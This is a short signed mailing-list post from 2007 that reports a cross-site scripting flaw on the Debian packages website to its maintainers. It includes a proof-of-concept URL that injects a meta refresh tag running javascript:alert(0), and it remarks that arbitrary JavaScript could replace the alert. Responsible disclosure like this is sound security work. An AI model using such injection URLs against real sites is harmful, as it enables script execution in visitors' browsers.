XSS in updated packages.debian.org

Moritz Naumann Tue, 18 Sep 2007 11:44:29 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,


there's an XSS issue in the updated p.d.o:

http://packages.debian.org/content%3D0%3Bjavascript%3Aalert%280%29%3E/http-equiv%3Drefresh/%3Cmeta

The '0' which is output could be replaced by encoded text or arbitrary
javascript instructions.

Moritz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFG8Be0n6GkvSd/BgwRCrjLAJ9VwLWJJWxBKn2XMEcEt0MBU16ObgCggI4l
C0i9uvn/q1uJrUwYkf9oFZo=
=TtSf
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

XSS in updated packages.debian.org

Reply via email to